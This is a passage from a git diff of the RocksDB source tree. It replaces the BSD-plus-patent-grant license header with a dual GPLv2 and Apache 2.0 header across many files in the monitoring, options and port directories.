-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/monitoring/histogram_windowing.h b/monitoring/histogram_windowing.h
index f183f3317f7..2a6d0dd1587 100644
--- a/monitoring/histogram_windowing.h
+++ b/monitoring/histogram_windowing.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2013, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/monitoring/instrumented_mutex.cc b/monitoring/instrumented_mutex.cc
index 443dc48136c..c07a5a17a8a 100644
--- a/monitoring/instrumented_mutex.cc
+++ b/monitoring/instrumented_mutex.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include "monitoring/instrumented_mutex.h"
 #include "monitoring/perf_context_imp.h"
diff --git a/monitoring/instrumented_mutex.h b/monitoring/instrumented_mutex.h
index b9cded792bb..83d7523ef31 100644
--- a/monitoring/instrumented_mutex.h
+++ b/monitoring/instrumented_mutex.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once

diff --git a/monitoring/iostats_context.cc b/monitoring/iostats_context.cc
index 019622a4306..8aa131a7042 100644
--- a/monitoring/iostats_context.cc
+++ b/monitoring/iostats_context.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include
 #include "monitoring/iostats_context_imp.h"
diff --git a/monitoring/iostats_context_imp.h b/monitoring/iostats_context_imp.h
index 0db9ffe401a..88538297a60 100644
--- a/monitoring/iostats_context_imp.h
+++ b/monitoring/iostats_context_imp.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/perf_step_timer.h" diff --git a/monitoring/iostats_context_test.cc b/monitoring/iostats_context_test.cc index f2d30433c52..74d3e43291d 100644 --- a/monitoring/iostats_context_test.cc +++ b/monitoring/iostats_context_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/iostats_context.h" #include "util/testharness.h" diff --git a/monitoring/perf_context.cc b/monitoring/perf_context.cc index 452d6ff8476..55df0459bf4 100644 --- a/monitoring/perf_context.cc +++ b/monitoring/perf_context.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/monitoring/perf_context_imp.h b/monitoring/perf_context_imp.h index 6371e1e1d22..421a8cea15c 100644 --- a/monitoring/perf_context_imp.h +++ b/monitoring/perf_context_imp.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/perf_step_timer.h" diff --git a/monitoring/perf_level.cc b/monitoring/perf_level.cc index 32c8ed392e9..79c718cce76 100644 --- a/monitoring/perf_level.cc +++ b/monitoring/perf_level.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
 //
 
 #include
diff --git a/monitoring/perf_level_imp.h b/monitoring/perf_level_imp.h
index 46f701e5d77..2a3add19cee 100644
--- a/monitoring/perf_level_imp.h
+++ b/monitoring/perf_level_imp.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include "rocksdb/perf_level.h"
diff --git a/monitoring/perf_step_timer.h b/monitoring/perf_step_timer.h
index ccd4356c57a..4cb48b12562 100644
--- a/monitoring/perf_step_timer.h
+++ b/monitoring/perf_step_timer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include "monitoring/perf_level_imp.h"
diff --git a/monitoring/statistics.cc b/monitoring/statistics.cc
index 460828996f3..9387043127d 100644
--- a/monitoring/statistics.cc
+++ b/monitoring/statistics.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 
 #include "monitoring/statistics.h"
diff --git a/monitoring/statistics.h b/monitoring/statistics.h
index 10d9f810fdb..6e915215deb 100644
--- a/monitoring/statistics.h
+++ b/monitoring/statistics.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include "rocksdb/statistics.h"
diff --git a/monitoring/statistics_test.cc b/monitoring/statistics_test.cc
index 2704899278a..43aacde9c1b 100644
--- a/monitoring/statistics_test.cc
+++ b/monitoring/statistics_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 
 #include "port/stack_trace.h"
diff --git a/monitoring/thread_status_impl.cc b/monitoring/thread_status_impl.cc
index 6c5d9cc3e79..e263ce661ef 100644
--- a/monitoring/thread_status_impl.cc
+++ b/monitoring/thread_status_impl.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 
 #include
diff --git a/monitoring/thread_status_updater.cc b/monitoring/thread_status_updater.cc
index aa925e6dcdd..7441c35f8bc 100644
--- a/monitoring/thread_status_updater.cc
+++ b/monitoring/thread_status_updater.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "monitoring/thread_status_updater.h"
 #include
diff --git a/monitoring/thread_status_updater.h b/monitoring/thread_status_updater.h
index 39920edeceb..69b4d4f7ecb 100644
--- a/monitoring/thread_status_updater.h
+++ b/monitoring/thread_status_updater.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // The implementation of ThreadStatus.
 //
diff --git a/monitoring/thread_status_updater_debug.cc b/monitoring/thread_status_updater_debug.cc
index b729d47d7c5..eec52e1887d 100644
--- a/monitoring/thread_status_updater_debug.cc
+++ b/monitoring/thread_status_updater_debug.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include
 
diff --git a/monitoring/thread_status_util.cc b/monitoring/thread_status_util.cc
index 19d86cecfb6..50692dfe55d 100644
--- a/monitoring/thread_status_util.cc
+++ b/monitoring/thread_status_util.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "monitoring/thread_status_util.h"
 
diff --git a/monitoring/thread_status_util.h b/monitoring/thread_status_util.h
index 9869bc5f81f..a403435c3d0 100644
--- a/monitoring/thread_status_util.h
+++ b/monitoring/thread_status_util.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 
diff --git a/monitoring/thread_status_util_debug.cc b/monitoring/thread_status_util_debug.cc
index fb8dc04a351..b4fa584747d 100644
--- a/monitoring/thread_status_util_debug.cc
+++ b/monitoring/thread_status_util_debug.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include
 
diff --git a/options/cf_options.cc b/options/cf_options.cc
index d0c0a6f5d88..67cbef68f6f 100644
--- a/options/cf_options.cc
+++ b/options/cf_options.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
#include "options/cf_options.h" diff --git a/options/cf_options.h b/options/cf_options.h index b1e11d7bb97..df5b460fc73 100644 --- a/options/cf_options.h +++ b/options/cf_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/db_options.cc b/options/db_options.cc index 030a70b9c4e..2a7860450cc 100644 --- a/options/db_options.cc +++ b/options/db_options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "options/db_options.h" diff --git a/options/db_options.h b/options/db_options.h index f8c291b3b29..18d1a5fb675 100644 --- a/options/db_options.h +++ b/options/db_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/options.cc b/options/options.cc index 3f9fb3027e0..7bd2c9582f4 100644 --- a/options/options.cc +++ b/options/options.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/options/options_helper.cc b/options/options_helper.cc index 6e217ae7393..9e984f6e39e 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. 
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "options/options_helper.h"
 #include
diff --git a/options/options_helper.h b/options/options_helper.h
index 39916451467..b15faa74f75 100644
--- a/options/options_helper.h
+++ b/options/options_helper.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 
diff --git a/options/options_parser.cc b/options/options_parser.cc
index 1e273383b6a..d5a3fec6ef0 100644
--- a/options/options_parser.cc
+++ b/options/options_parser.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #ifndef ROCKSDB_LITE
 
diff --git a/options/options_parser.h b/options/options_parser.h
index 9d2c0871599..cae3dbba9b4 100644
--- a/options/options_parser.h
+++ b/options/options_parser.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 
diff --git a/options/options_sanity_check.cc b/options/options_sanity_check.cc
index 91f8c4d9788..d3afcc060ed 100644
--- a/options/options_sanity_check.cc
+++ b/options/options_sanity_check.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #ifndef ROCKSDB_LITE
 
diff --git a/options/options_sanity_check.h b/options/options_sanity_check.h
index 645a6ce1e62..118fdd208ba 100644
--- a/options/options_sanity_check.h
+++ b/options/options_sanity_check.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #pragma once
 
diff --git a/options/options_settable_test.cc b/options/options_settable_test.cc
index 8345ec1824f..ab9989fb46f 100644
--- a/options/options_settable_test.cc
+++ b/options/options_settable_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/options/options_test.cc b/options/options_test.cc
index 60a63147f7f..d5eb42b0906 100644
--- a/options/options_test.cc
+++ b/options/options_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/dirent.h b/port/dirent.h
index 093cb1658b2..7bcc3569780 100644
--- a/port/dirent.h
+++ b/port/dirent.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/likely.h b/port/likely.h
index 95dd06e128d..e5ef786f2ec 100644
--- a/port/likely.h
+++ b/port/likely.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/port.h b/port/port.h
index 3ccc6c6eafc..13aa56d47b1 100644
--- a/port/port.h
+++ b/port/port.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/port_example.h b/port/port_example.h
index 2769284c93c..05b3240669d 100644
--- a/port/port_example.h
+++ b/port/port_example.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/port_posix.cc b/port/port_posix.cc
index 42e89f8c874..59241daff44 100644
--- a/port/port_posix.cc
+++ b/port/port_posix.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/port_posix.h b/port/port_posix.h
index e02224828fd..72beb0409f3 100644
--- a/port/port_posix.h
+++ b/port/port_posix.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/stack_trace.cc b/port/stack_trace.cc
index d2798617100..baaf140142d 100644
--- a/port/stack_trace.cc
+++ b/port/stack_trace.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 
 #include "port/stack_trace.h"
diff --git a/port/stack_trace.h b/port/stack_trace.h
index a2082ec14e8..f1d4f1febfa 100644
--- a/port/stack_trace.h
+++ b/port/stack_trace.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 namespace rocksdb {
diff --git a/port/sys_time.h b/port/sys_time.h
index 94b367dc8ba..1e2ad0f5d6d 100644
--- a/port/sys_time.h
+++ b/port/sys_time.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/util_logger.h b/port/util_logger.h
index 33998f738da..a8255ad6d65 100644
--- a/port/util_logger.h
+++ b/port/util_logger.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/env_default.cc b/port/win/env_default.cc
index be0c3a5702c..52a984f74ce 100644
--- a/port/win/env_default.cc
+++ b/port/win/env_default.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/port/win/env_win.cc b/port/win/env_win.cc
index 63484d369fc..1e7ea0cb8dc 100644
